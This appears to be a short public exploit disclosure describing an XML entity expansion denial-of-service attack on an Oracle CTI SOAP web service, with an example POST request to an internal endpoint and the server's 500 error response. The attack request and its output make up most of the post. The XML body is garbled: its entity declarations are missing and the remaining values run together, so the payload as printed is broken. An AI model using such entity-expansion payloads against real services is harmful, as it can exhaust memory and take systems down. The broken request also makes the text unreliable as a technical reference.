# Exploit Title: Oracle CTI Web Service XML Entity Exp. # Exploit Author: omurugur # Author Web: https://www.justsecnow.com # Author Social: @omurugurrr URL : http://10.248.68.188/EBS_ASSET_HISTORY_OPERATIONS As can be seen in the following request / response example, the xml entity expansion attack can be performed, and this attack can send requests that exceed the existing memory and processor capacities, causing memory bottlenecks and preventing the service from running. 10kb more request is returned. Examples Request; POST /EBS_ASSET_HISTORY_OPERATIONS HTTP/1.1 Accept-Encoding: gzip, deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "getCampaignHistory" Content-Length: 1696 Host: **** User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: close ]> 152069827209115206982720 SIEBEL retrieveWebChatHistory 5051234567 Example Response1; HTTP/1.1 500 Internal Server Error Date: Tue, 17 Apr 2018 06:33:07 GMT Content-Type: text/xml; charset=utf-8 X-ORACLE-DMS-ECID: c55d8ba7-c405-4117-8a70-8b37f745e8f0-0000b9df X-ORACLE-DMS-RID: 0 Connection: close Content-Length: 328676 soapenv:Server.SYS000000Undefined Avea Service Bus ErrorMW-4b9f61d0-7792-4e54-a694-b9ef8c407b7eSYSTEMOSB-382510SYS000000:Undefined Avea Service Bus ErrorPipelinePairNodePipelinePairNode_requestDynamic Validationrequest-pipelinetrue